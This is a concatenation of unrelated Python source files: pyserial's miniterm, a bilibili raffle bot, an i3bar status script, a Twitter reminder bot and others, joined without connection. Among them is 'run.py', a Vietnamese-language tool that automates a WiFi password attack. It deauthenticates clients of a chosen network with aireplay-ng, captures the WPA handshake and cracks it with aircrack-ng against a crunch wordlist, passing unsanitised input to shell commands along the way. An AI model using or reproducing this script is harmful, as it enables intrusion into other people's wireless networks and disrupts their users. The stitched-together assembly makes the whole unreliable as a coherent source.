""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
run.py
|
#Nạp các dữ liệu càn thiết
import os
import time
from threading import Thread
import threading
import sys
import os.path
from multiprocessing import Process
#----------------------------------------------
# Các giá trị đặt trước
help_error = set(['h','H'])
card_network = os.listdir('/sys/class/net/')
yes = set(['yes','y', 'ye', 'Y','Ye','YES'])
no = set(['n','no','N','NO'])
PATH = 'Sat-pwd.txt'
#-----------------------------------------------
# Bắt đầu chương trình
#-------------------------------------------
def attack():
os.system('clear')
input('<><> Enter để tiếp tục : ')
pwd = input('<><> Đường dẫn đến file password : ')
path_check = os.path.isfile(pwd)
while path_check is False:
pwd = input('<><> [ ! ] File không tồn tại [ ! ] Nhập lại : ')
path_check = os.path.isfile(pwd)
os.system('clear')
os.system('sudo aircrack-ng -a 2 -w '+pwd+' '+'"'+essid+'-01.cap'+'"')
os.system('rm *.cap *.csv *.netxml')
input(''''
<><><><><><><><><><><><><><><><><><><><><><><><><><>
[ ! ] Đã có mật khẩu. Nhấn Enter để thoát chương trình [ ! ]
[ ! ] Nếu chưa có . Đảm bảo rằng mục tiêu của bạn đang có ít nhất một người đang dùng Wifi và khoảng cách sóng đủ mạnh [ ! ]
<><><><><><><><><><><><><><><><><><><><><><><><><><>''')
os.system('airmon-ng stop '+interface+'mon')
os.system('clear')
exit()
#------------------------------------------------
def help():
os.system('clear')
print ('''[ ! ] Lỗi xảy ra do các nguyên nhân sau [ ! ]
1. Máy của bạn không hỗ trợ
2. Bạn gõ không đúng tên giao diện [ Không thêm bất cứ kí tự khác kể cả dấu trắng ]
3. Bạn chọn không đúng tên giao diện mạng [ Đảm bảo bạn chọn Wireless ]
4. Bạn đã bật chế độ Monitor trên giao diện đó [ Chỉ cần tắt đi là được ]
[ ! ] Nếu không giả quyết được vui lòng liên hện : itsat1728.blogspot.com [ ! ]
<><> Nhấn Enter để quay lại ! <><>''')
input('<><> Enter ?')
tuy_chon3()
#--------------------------------------------
def information():
global essid
print('''
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
[ ! ] Nhắm mục tiêu của bạn và cho chúng tôi biết các giá trị sau : CH - BSSID - ESSID [ ! ]
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>''')
print('<><><><><> [ ! ] https://itsat1728.blogspot.com [ ! ] <><><><><>')
input('<><><><><> [ ! Enter để tiếp tuc ! ]')
print('''<><><><><><><><><><><><><><>
KHÔNG ĐƯỢC PHÉP CHỨA BẤT KÌ DẤU CÁCH NÀO TRONG CÁC CÂU TRẢ LỜI !
1. Lỗi sẽ xảy ra nếu bạn làm sai.
2. Lỗi xảy ra nếu bạn gõ sai
<><><><><><><><><><><><><><><>''')
ch = input('<><> CH : ')
while ch < '1' :
print('<><> Đùa nhau hả ?')
ch = input('<><> CH : ')
bssid = input('<><> BSSID : ')
essid = input('<><> ESSIS : ')
os.system('clear')
def scanner():
os.system('sudo airodump-ng -c '+ch+' --bssid '+bssid+' -w '+'"'+essid+'"'+' '+interface+'mon')
def scanner2():
os.system('xfce4-terminal -x sudo aireplay-ng -0 1000 -a '+bssid+' '+interface+'mon')
def stop_scanner():
os.system('killall airodump-ng')
os.system('killall aireplay-ng')
t1 = Process(target=scanner)
t2 = Process(target=scanner2)
t3 = Process(target=stop_scanner)
t1.start()
t2.start()
time.sleep(120)
t3.start()
os.system('clear')
attack()
#--------------------------------------------
def banner():
os.system('clear')
print('''
CHƯƠNG TRÌNH BÁN TỰ ĐỘNG HÓA AIRCRACK-NG
AUTHOR : IT SAT [ PyThOn 3 ]
BLOG : HTTPS://ITSAT1728.BLOGSPOT.COM
''')
print(' [ ! ] Người sủ dụng :'+ name +' [ ! ]')
print('''
1. YÊU CẦU :
> Aircrack-ng
> Crunch
> Root [ Bạn có thể sửa bằng cachs thêm sudo vào các lệnh trong này ]
> Đọc README.txt
> Sử dụng màn hình trong kích cỡ tối đa
2. TÙY CHỌN
1. Cài đặt Aircrack-ng và các chương trình liên quan
2. Tạo file từ điển mật khẩu bằng crunch
3. Có tất rồi ! Bỏ qua và chuyển đến chương trình chính
4. Thoát
<><><><><><><><><><><><><><><<><><><><><><><><><><><><><> ''')
#-----------------------------------------------------------
def crunch():
os.system('clear')
print('''Crunch sẽ dùng theo lệnh cấu trúc như sau :
crunch [min] [max] [charset] -t [pattern] -o [path file]
với:
[charset]: kí tự có trong mật khẩu
[pattern]: các kí tự bạn đã biết chắc
[path file]: đừng dẫn file được tạo ''')
so_luong= input('<><> Chọn số lượng kí tự bạn nghĩ có trong mật khẩu [ Chọn số tự nhiên khác 0 nếu bạn không muốn bị lỗi trong các bước tiếp theo ]: \n<><> : ')
charset = input('<><> Các kí tự bạn nghĩ sẽ có trong mật khẩu : \n<><> : ')
print('''[ ! ] Các kí tự bãn đã biết chắc là các kí tự bạn đã biết nó là gì và ở vị trí nào [ ! ]
=> Ví dụ bạn nghĩ mật khẩu chứa 3 kí tự và bạn đã biết 1 kí tự là 3 và là kí tự thứ 2 vậy phần này bạn sẽ trả lời là @3@
=> Còn nếu không biết kí tự nào cả hay cách sắp xếp của chúng thì chỉ cần gõ @@@ tương ứng với câu trả lời phía trên của bạn , tức phía trên cùng bạn trả lời là 3 thì dưới này gõ 3 dấu @@@ ''')
pattern = input ('<><> Các kí tự bạn đã biết chắc : \n<><> : ')
os.system('clear')
print('''
<><><><><><><><><><><><><>
''')
os.system('rm Sat-pwd.txt')
os.system('crunch '+so_luong+' '+so_luong+' '+charset+' -t '+pattern+' -o '+'Sat-pwd.txt')
print('''
<><><><><><><><><><><><><>
''')
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
print ('''File tạo thành công . Nhấn Enter để quay về trang chủ
==> File tên : Sat-pwd.txt <==
''')
input('<><> ? <><>')
banner()
tuy_chon()
else:
print ('''File tạo không thành công . Thử lại ?
''')
input('<><> ? <><>')
banner()
tuy_chon()
tuy_chon()
#--------------------------------------------------------------
def tuy_chon3():
os.system('clear')
print('<><> Bạn đang ở tùy chọn 3 : '+name+' <><>')
print ('<><><><><><><><><><><><><><><>')
os.system('sudo airmon-ng check kill')
os.system('sudo airmon-ng start '+interface)
print('<><><><><><><><><><><><><><><>')
interface2 = os.listdir('/sys/class/net/')
check = interface+'mon'
if check in interface2 :
print ('''
<><><><><><><><>
Thành công ! . Đã chuyển sang chế độ giám sát <><><>
<><><><><><><><>''')
else :
print ('''
[ ! ] Oh No ! Hình như bạn vừa gõ sai tên giao diện hoặc một lỗi không xác định đã xảy ra ! [ ! ]
''')
reset = input('''<><> Nhấn Enter để thử lại
<><> Nhấn H để gọi trợ giúp :
<><> Nhấn 2 để bỏ qua lỗi và không xử lí được vấn đề. Ha Ha Ha
<><> Bạn muốn ? :''')
if reset in help_error :
help()
elif reset == '2':
pass
else:
tuy_chon3()
def airodump_ng():
os.system('airodump-ng wlan0mon')
def close_airodump():
os.system('killall airodump-ng')
p1 = Process(target=airodump_ng)
p2 = Process(target=close_airodump)
p1.start()
time.sleep(60)
p2.start()
information()
#---------------------------------------------------------
def tuy_chon2():
xac_thuc = input('<><> Bạn đang chọn tùy chọn 2 ! Tiếp tục hay không [ Enter để tiếp tục , N để thoát ! ] :>>>: ')
if xac_thuc in no :
banner()
tuy_chon()
else :
crunch()
def tuy_chon():
chon = input('<><> Lựa chọn của bạn là : ')
if chon == '1':
os.system('clear')
os.system('sudo apt install aircrack-ng && sudo apt install crunch')
banner()
print('''
<><><><><><><><>
Cài đặt hoàn tất
<><><><><><><><>''')
tuy_chon()
elif chon == '2' :
tuy_chon2()
elif chon == '3' :
tuy_chon3()
elif chon == '4' :
print ('<><> Bye Bye <><>')
time.sleep(2)
os.system('clear')
exit()
else :
banner()
tuy_chon()
#---------------------------------------
os.system('rm *.cap *.csv *.netxml')
os.system('clear')
name = input('<><> Tên của bạn là gì ? :')
print ('<><> Hiện tại máy bạn đang có các giao diện mạng sau <><>')
print (card_network)
interface = input('<><> Tên giao diện mạng bạn định dùng là [!] Giao diện không dây [!]: ')
if interface+'mon' in card_network:
print('''
<><><><><><><><><><><><><><>
[ ! ] Hình như máy bạn đã bật chế độ monitor. Làm ơn tắt nó đi và chạy lại chương trình nếu không bạn sẽ gặp lỗi ở các bước sau [ ! ]
<><><><><><><><><><><><><><>
''')
else:
pass
while interface not in card_network:
interface = input('<><> Tên giao diện mạng bạn định dùng là [!] Giao diện không dây [!]: ')
if interface+'mon' in card_network:
print('''
<><><><><><><><><><><><><><>
[ ! ] Hình như máy bạn đã bật chế độ monitor. Làm ơn tắt nó đi và chạy lại chương trình hoặc bạn sẽ bị lỗi ở các bước sau [ ! ]
<><><><><><><><><><><><><><>
''')
else:
banner()
tuy_chon()
|
run.py
|
import OnlineHeart
import Silver
import Tasks
import connect
from rafflehandler import Rafflehandler
import asyncio
import printer
from statistics import Statistics
from bilibili import bilibili
from configloader import ConfigLoader
import threading
import os
import online_net
import bili_console
from bilitimer import BiliTimer
loop = asyncio.get_event_loop()
fileDir = os.path.dirname(os.path.realpath(__file__))
conf = ConfigLoader(fileDir)
area_ids = conf.dic_user['other_control']['area_ids']
# print('Hello world.')
printer.init_config()
bilibili()
online_net.login()
online_net.OnlineNet()
Statistics(len(area_ids))
rafflehandler = Rafflehandler()
var_console = bili_console.Biliconsole(loop)
list_raffle_connection = [connect.RaffleConnect(i) for i in area_ids]
list_raffle_connection_task = [i.run() for i in list_raffle_connection]
yjconnection = connect.YjConnection()
danmu_connection = connect.connect()
bili_timer = BiliTimer(loop)
console_thread = threading.Thread(target=var_console.cmdloop)
console_thread.start()
Tasks.init()
tasks = [
OnlineHeart.run(),
Silver.run(),
danmu_connection.run(),
rafflehandler.run(),
yjconnection.run()
]
try:
loop.run_until_complete(asyncio.wait(tasks + list_raffle_connection_task))
except KeyboardInterrupt:
# print(sys.exc_info()[0], sys.exc_info()[1])
if ConfigLoader().dic_user['other_control']['keep-login']:
pass
else:
response = online_net.logout()
console_thread.join()
loop.close()
|
i3bar.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import time
import os
import json
import time
import string
import threading
import subprocess as sp
arr = []
text = ''
def LOG(content):
pass
# with open("/home/pallav/log2", "a") as f:
# f.write(content)
# f.write("\n")
def battery():
dict = {}
status = open('/sys/class/power_supply/BAT0/status').read()
percent = open('/sys/class/power_supply/BAT0/capacity').read()
if 'Charging' in status or 'Full' in status:
charge = True
else:
charge = False
if charge == True:
dict['color'] = '#00ff00'
elif int(percent) > 25:
dict['color'] = '#ffff00'
else:
dict['color'] = '#ff0000'
dict["full_text"] = '{0:^18}'.format(status.replace('\n', '') + ' ('+percent[:-1]+'%)')
dict["name"] = 'bat'
dict["instance"] = '0'
return dict
def datetime():
dict = {}
dict['full_text'] = time.strftime('%d/%m/%y, %I:%M %p (%a)')
dict["name"] = 'time'
dict["instance"] = '0'
return dict
def click_events():
global text
try:
buff = ''
while True:
buff += input()
text = buff[0].replace(',', '') + buff[1:]
try:
obj = json.loads(text)
LOG(str(obj))
if obj["name"] == "vol":
if "relative_x" in obj:
obj["x"] = 1500 + obj["relative_x"] - 47
if obj["button"] == 1 and obj["x"] >= 1500 and obj["x"] <= 1605:
new_vol = 10*((obj["x"] - 1500)/7 + 1)
arr = ["pamixer", "--allow-boost", "--set-volume", str(int(new_vol))]
sp.call(arr)
repaint()
if obj["button"] == 2 or obj["button"] == 3:
sp.call(["bash", "-c", "pavucontrol&"])
except Exception as e:
text = str(e)
buff = ''
except KeyboardInterrupt:
sys.stdout.flush()
pass
def sound():
try:
proc = sp.check_output(["pamixer", "--get-volume"]).replace(b"\n", b"")
except Exception as e:
proc = b"0"
text = u"\u266b " + proc.decode()
bar = []
percent = int(proc)//10
bar = [u'\u2588']*percent + [u'\u2592']*(15-percent)
dict = {'full_text': u'{:>21}'.format(text + " " + ''.join(bar))}
dict["name"] = "vol"
dict["instance"] = "0"
return dict
def bright():
proc = float(sp.check_output(["light"]).replace(b"\n", b''))
text = u"\u2600 "+str(int(proc))+"%"
dict = {'full_text': u'{:^7}'.format(text)}
dict["name"] = "bright"
dict["instance"] = "0"
return dict
def connection(fullName, abbrv):
ifc = sp.Popen(["ifconfig"], stdout=sp.PIPE)
grp = sp.Popen(["grep", "-A", "1", fullName],
stdin=ifc.stdout, stdout=sp.PIPE)
ans = sp.Popen(["sed", "-En",
r"s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p"],
stdin=grp.stdout, stdout=sp.PIPE)
ip = ans.stdout.read().replace(b"\n", b"").decode()
dict = {'name': 'wlan'}
dict["instance"] = "0"
if '.' in ip:
dict["full_text"] = '{:^20}'.format(abbrv + ": "+ip)
dict['color'] = '#44ff11'
else:
dict["full_text"] = '{:^20}'.format(abbrv + ": --.--.--.--" )
dict['color'] = '#ff4411'
return dict
def repaint():
arr = []
create(arr)
print (',', json.dumps(arr))
sys.stdout.flush()
def create(arr):
# global text
# arr.append({'full_text': str(text)})
arr.append(connection('enp', 'E'))
arr.append(connection('wlp', 'W'))
arr.append(bright())
arr.append(sound())
arr.append(battery())
arr.append(datetime())
if __name__ == '__main__':
th = threading.Thread(target=click_events, args=())
th.start()
print ('{ "version": 1, "click_events": true }')
print ('[')
print ('[]')
repaint()
while True:
repaint()
time.sleep(1)
|
background.py
|
from threading import Thread
from time import sleep
from watersimulation.models import Dataset
def mainThread():
pass
def start():
'''thread = Thread(target = mainThread)
thread.start()
thread.join()
print('.thread finished', end='')
'''
data={
Dataset.objects.all().filter(place="1"),
Dataset.objects.all().filter(place="2"),
Dataset.objects.all().filter(place="3"),
Dataset.objects.all().filter(place="4"),
Dataset.objects.all().filter(place="5")
}
result = []
for d in data:
print(d)
|
tasQ_utf8.py
|
# -*- coding: utf-8 -*-
import tweepy
from tweepy.streaming import StreamListener
from tweepy.error import TweepError
import psycopg2
import urlparse
import os
import sys
import time
import re
import datetime
import threading
tweetlock = threading.Lock()
class TimeoutException(Exception):
pass
class MyListener:
def __init__(self, api, conn, cur):
# register regex
self.rgx_add = re.compile(ur'(?:(\d+)年|)(?:(\d+)月|)(?:(\d+)日|)(?:(\d+)時|)(?:(\d+)分|)(?:(まで)|).*?、(.+)'.encode('utf-8'), re.U)
self.rgx_showtask = re.compile(ur'^予定'.encode('utf-8'), re.U)
# set api
self.api = api
self.conn = conn
self.cur = cur
def on_status(self, status):
if(status.in_reply_to_user_id == self.api.me().id):
# parse status
try:
self.parse(status.text, status)
except TweepError as e:
print e.message
except ValueError as e:
print u"コマンドが正しくないです。".encode('utf-8')
screennameWithAt = u'@'+self.api.me().screen_name
reply_str = status.text.replace(screennameWithAt, u'')
with tweetlock:
self.api.update_status(None, u"@"+status.author.screen_name+u" "+u"コマンドが正しくないです(ValueError)。「"+reply_str+u"」", in_reply_to_status_id=status.id)
def getTimeDeltaLevel(self, td):
if td > datetime.timedelta(31):
return 6
elif td > datetime.timedelta(7):
return 5
elif td > datetime.timedelta(1):
return 4
elif td > datetime.timedelta(days=0, hours=6):
return 3
elif td > datetime.timedelta(days=0, hours=1):
return 2
elif td > datetime.timedelta(days=0, minutes=30):
return 1
else:
return 0
def parse(self, reply_str, reply_status):
print "call parse"
#parse reply string
#delete @[screen_name]
screennameWithAt = u'@'+self.api.me().screen_name
reply_str = reply_str.replace(screennameWithAt, u'')
reply_str = reply_str.replace(u' ', u'')
reply_str = reply_str.replace(u' ', u'')
print reply_str.encode('utf-8')
date_now = datetime.datetime.now()
date_to_add = datetime.datetime(date_now.year, date_now.month, date_now.day, date_now.hour, date_now.minute)
print date_now
print date_to_add
if (self.rgx_add.match(reply_str.encode('utf-8')) != None): # add command accepted
y, mo, d, h, mi = self.rgx_add.match(reply_str.encode('utf-8')).groups()[0:5]
print self.rgx_add.match(reply_str.encode('utf-8')).groups()
y = int(y) if y!=None else None
mo = int(mo) if mo!=None else None
d = int(d) if d!=None else None
h = int(h) if h!=None else None
mi = int(mi) if mi!=None else None
if(y==None and mo==None and d==None and h!=None and mi==None): #h時
date_to_add = datetime.datetime(date_now.year, date_now.month, date_now.day, h)
elif(y==None and mo==None and d==None and h!=None and mi!=None): #h時mi分
date_to_add = datetime.datetime(date_now.year, date_now.month, date_now.day, h, mi)
elif(y==None and mo!=None and d!=None and h==None and mi==None): #mo月d日
date_to_add = datetime.datetime(date_now.year, mo, d)
elif(y==None and mo!=None and d!=None and h!=None and mi==None): #mo月d日h時
date_to_add = datetime.datetime(date_now.year, mo, d, h)
elif(y==None and mo!=None and d!=None and h!=None and mi!=None): #mo月d日h時mi分
date_to_add = datetime.datetime(date_now.year, mo, d, h, mi)
elif(y!=None and mo!=None and d!=None and h==None and mi==None): #y年mo月d日
date_to_add = datetime.datetime(y, mo, d)
elif(y!=None and mo!=None and d!=None and h!=None and mi==None): #y年mo月d日h時
date_to_add = datetime.datetime(y, mo, d, h)
elif(y!=None and mo!=None and d!=None and h!=None and mi!=None): #y年mo月d日h時mi分
date_to_add = datetime.datetime(y, mo, d, h, mi)
else: #invalid data
date_to_add = None
isDeadline = self.rgx_add.match(reply_str.encode('utf-8')).groups()[5] != None
print date_to_add
#add to database
if(date_to_add == None):
raise ValueError
self.cur.execute('insert into tasks values (%s, %s, %s, %s, %s)', (reply_status.author.id, date_to_add, self.rgx_add.match(reply_str.encode('utf-8')).groups()[6], isDeadline, self.getTimeDeltaLevel(date_to_add - date_now)))
self.conn.commit()
with tweetlock:
self.api.update_status(None, u"@"+reply_status.author.screen_name+u" "+u"予定を追加「"+reply_str+u"」", in_reply_to_status_id=reply_status.id)
elif (self.rgx_showtask.match(reply_str.encode('utf-8')) != None):
print u'予定'.encode('utf-8')
self.cur.execute('select * from tasks order by date')
all_tasks = u''
for t in self.cur.fetchall():
#t[2] is task t[1] is date
if(self.api.get_user(t[0]).id == reply_status.author.id):
all_tasks=all_tasks+str(t[1]).decode('utf-8')+u'に'+str(t[2]).decode('utf-8')+u'。'
len_str = len(all_tasks)
all_tasks_list = [all_tasks[i:i+100] for i in range(0, len_str, 100)]
print all_tasks_list
for tw in all_tasks_list:
with tweetlock:
tw = u"@"+reply_status.author.screen_name+u' '+tw
self.api.update_status(None, tw, in_reply_to_status_id=reply_status.id)
else:
# search mode
self.cur.execute('select * from tasks order by date')
search_result = u''
is_found = False
for t in self.cur.fetchall():
# t[2] is task t[1] is date
if(self.api.get_user(t[0]).id == reply_status.author.id):
if(reply_str in str(t[2]).decode('utf-8')):
is_found = True
search_result = search_result + str(t[1]).decode('utf-8')+u'に'+str(t[2]).decode('utf-8')+u'。'
if(is_found is False):
search_result = u'予定が見つからないです。'
len_str = len(search_result)
search_result_list = [search_result[i:i+100] for i in range(0, len_str, 100)]
for tw in search_result_list:
with tweetlock:
tw = u"@"+reply_status.author.screen_name+u' '+tw
self.api.update_status(None, tw, in_reply_to_status_id=reply_status.id)
#schedule
def checkSchedule(api,conn,cur):
while True:
time.sleep(60)
print "scheduler wake"
#get current date
datenow = datetime.datetime.now()
print datenow
#send query
cur.execute('select * from tasks')
for t in cur.fetchall():
#check date
print t
if(t[1] <= datenow):
#delete
print "delete"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"の時刻です")
except TweepError as e:
print e.message
try:
cur.execute('delete from tasks where user_id=%s and date=%s and task=%s and is_deadline=%s', t[0:4])
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(31) and t[4] == 6):
# last 1 month
print "1 month"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと約1ヶ月です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(7) and t[4] == 5):
# last 1 week
print "1 week"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと1週間です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(1) and t[4] == 4):
# last 1 day
print "1 day"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと1日です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(days=0, hours=6) and t[4] == 3):
# last 6 hour
print "6 hour"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと6時間です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(days=0, hours=1) and t[4] == 2):
# last 1 hour
print "1 hour"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと1時間です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
elif (t[1] - datenow <= datetime.timedelta(days=0, minutes=30) and t[4] == 1):
# last 1 month
print "half hour"
try:
with tweetlock:
api.update_status(None, u"@"+api.get_user(t[0]).screen_name+u" "+t[2].decode('utf-8')+u"まであと30分です")
except TweepError as e:
print e.message
try:
cur.execute('update tasks set report_level=%s where user_id=%s and date=%s and task=%s and is_deadline=%s', (t[4]-1, t[0], t[1], t[2], t[3]))
except psycopg2.Error:
pass
conn.commit()
print "read to sleep"
if __name__ == '__main__':
#authorization
consumerKey = os.environ['CONSUMER_KEY']
consumerSecret = os.environ['CONSUMER_SECRET']
accessToken = os.environ['ACCESS_TOKEN']
accessSecret = os.environ['ACCESS_SECRET']
auth = tweepy.OAuthHandler(consumerKey, consumerSecret)
auth.set_access_token(accessToken, accessSecret)
api = tweepy.API(auth)
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(os.environ["DATABASE_URL"])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
cur = conn.cursor();
print u"セット完了".encode('utf-8')
thr = threading.Thread(target=checkSchedule, name="scheduler", args=(api,conn,cur))
thr.setDaemon(True)
thr.start()
print "thread start"
#initialize listener
listner = MyListener(api, conn, cur)
since_id = 0
first_exec = True
j_i_k_o_id = 535427149
#get 10 tweets from j_i_k_o's timeline
while True:
time.sleep(30)
print "usertimelinescheduler wake"
print "since id={0}".format(since_id)
statuses = []
if first_exec:
statuses = api.user_timeline(j_i_k_o_id, count=10)
else:
statuses = api.user_timeline(j_i_k_o_id, since_id=since_id, count=10)
for status in statuses:
listner.on_status(status)
if len(statuses) != 0:
since_id = statuses[0].id
first_exec = False
|
utils.py
|
#!/usr/bin/env python3
#
# Oregano - lightweight Ergon client
# Copyright (C) 2012 thomasv@gitorious
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, os, json, qrcode, qrcode.image.svg, tempfile, random, queue, threading, time, stat
from collections import namedtuple
from inspect import signature
from typing import Callable, Any, Tuple
from .uikit_bindings import *
from .custom_objc import *
from oregano.i18n import _
from oregano.util import PrintError
def is_2x_screen() -> bool:
